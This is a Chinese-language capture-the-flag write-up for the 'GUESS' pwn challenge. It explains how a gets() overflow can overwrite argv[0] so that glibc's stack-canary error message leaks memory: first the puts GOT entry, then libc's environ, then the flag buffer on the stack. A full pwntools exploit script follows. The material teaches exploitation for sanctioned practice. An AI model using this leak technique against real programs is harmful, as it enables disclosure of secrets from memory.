首先 查看保護

開啟了 canary，NX? ?64位程序

ida查看程序

__int64 __fastcall main(__int64 a1, char **a2, char **a3)

{

? __WAIT_STATUS stat_loc; // [rsp+14h] [rbp-8Ch]

? int v5; // [rsp+1Ch] [rbp-84h]

? __int64 v6; // [rsp+20h] [rbp-80h]

? __int64 v7; // [rsp+28h] [rbp-78h]

? char buf; // [rsp+30h] [rbp-70h]

? char s2; // [rsp+60h] [rbp-40h]

? unsigned __int64 v10; // [rsp+98h] [rbp-8h]

? v10 = __readfsqword(0x28u);

? v7 = 3LL;

? LODWORD(stat_loc.__uptr) = 0;

? v6 = 0LL;

? sub_4009A6(a1, a2, a3);

? HIDWORD(stat_loc.__iptr) = open("./flag.txt", 0, a2);

? if ( HIDWORD(stat_loc.__iptr) == -1 )

? {

? ? perror("./flag.txt");

? ? _exit(-1);

? }

? read(SHIDWORD(stat_loc.__iptr), &buf, 0x30uLL);

? close(SHIDWORD(stat_loc.__iptr));

? puts("This is GUESS FLAG CHALLENGE!");

? while ( 1 )

? {

? ? if ( v6 >= v7 )

? ? {

? ? ? puts("you have no sense... bye :-) ");

? ? ? return 0LL;

? ? }

? ? v5 = sub_400A11();

? ? if ( !v5 )

? ? ? break;

? ? ++v6;

? ? wait((__WAIT_STATUS)&stat_loc);

? }

? puts("Please type your guessing flag");

? gets(&s2);

? if ( !strcmp(&buf, &s2) )

? ? puts("You must have great six sense!!!! :-o ");

? else

? ? puts("You should take more effort to get six sence, and one more challenge!!");

? return 0LL;

}

首先是將flag.txt讀入到buf中

這里有一個get 可以進行溢出

我們知道開啟canary后 如果溢出將canary覆蓋掉的話就會進入__stack_chk_fai 這個函數(shù)

看一下這個函數(shù)的源碼

void__attribute__ ((noreturn)) __stack_chk_fail (void)

{

__fortify_fail ("stack smashing detected");

}

void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)

{

? /* The loop is added only to keep gcc happy.? */

? while (1)

? ? __libc_message (2, "*** %s ***: %s terminated\n", msg, __libc_argv[0] ?: "<unknown>");

}

看到函數(shù)中會將 __libc_argv[0]輸出? 如果__libc_argv[0]指向的是存儲flag.txt那個buf的位置呢？? 就會把buf輸出出來

這就是 stack smashing的原理? ?通過覆蓋__libc_argv[0]的內容通過canary保護報錯信息將我們覆蓋的內容輸出出來

這里就是觸發(fā)了canary保護 輸出了

*** stack smashing detected ***: ./GUESS terminated

首先思考第一個問題

如何覆蓋argv[0]這個變量？

可以通過gdb調試先找到我們輸入地方的地址 然后再找到argv的地址 這樣就可以計算兩者之間的偏移?

先找argv的地址，在上邊那個圖中可以看到 argv[0]? 輸出的是 “./GUESS”

這是指的程序文件，我們可以用gdb進行調試 斷點下在main函數(shù)入口? 指向文件位置那個就是argv[0]的地址

也可以直接通過 p 命令

然后就是 我們輸入的地址 也就是s2的地址

可以將斷點下在call get這個位置

可以看到s2是在rbp-0x40的位置

那么偏移就有了

下一個問題

我們如何讓argv[0]指向存儲flag的buf位置呢？

首先說一個environ

environ是libc中存儲棧地址的一個變量? 我們可以泄露libc地址然后算出environ的地址 然后算出flag和environ的偏移 就可以將flag通過觸發(fā)cancry報錯出來

存flag的地址和上邊s2一樣方法算出來

environ可以通過給在environ這下一個斷點

就得到environ的地址了 那么 flag和environ的偏移就可以算了

from pwn import *

from LibcSearcher import *

sh = process('./GUESS')

#sh = remote('node3.buuoj.cn',29890)

elf = ELF('./GUESS')

puts_got = elf.got['puts']

print 'puts_got='+p64(puts_got)

def stackoverflow(payload):

? sh.sendlineafter('Please type your guessing flag',payload)

stackoverflow('a'*0x128 + p64(puts_got))

sh.recvuntil('stack smashing detected ***: ')

puts_addr = u64(sh.recv(6).ljust(8,'\x00'))

print 'puts_addr='+hex(puts_addr)

libc = LibcSearcher('puts',puts_addr)

libc_base = puts_addr - libc.dump('puts')

environ_addr = libc_base + libc.dump('__environ')

print 'environ_addr='+hex(environ_addr)

stackoverflow('a'*0x128 + p64(environ_addr))

sh.recvuntil('stack smashing detected ***: ')

stack_addr = u64(sh.recv(6).ljust(8,'\x00'))

print 'stack_addr'+hex(stack_addr)

flag_addr = stack_addr - 0x168

print 'flag_addr=',hex(flag_addr)

stackoverflow('a'*0x128 + p64(flag_addr))

sh.interactive()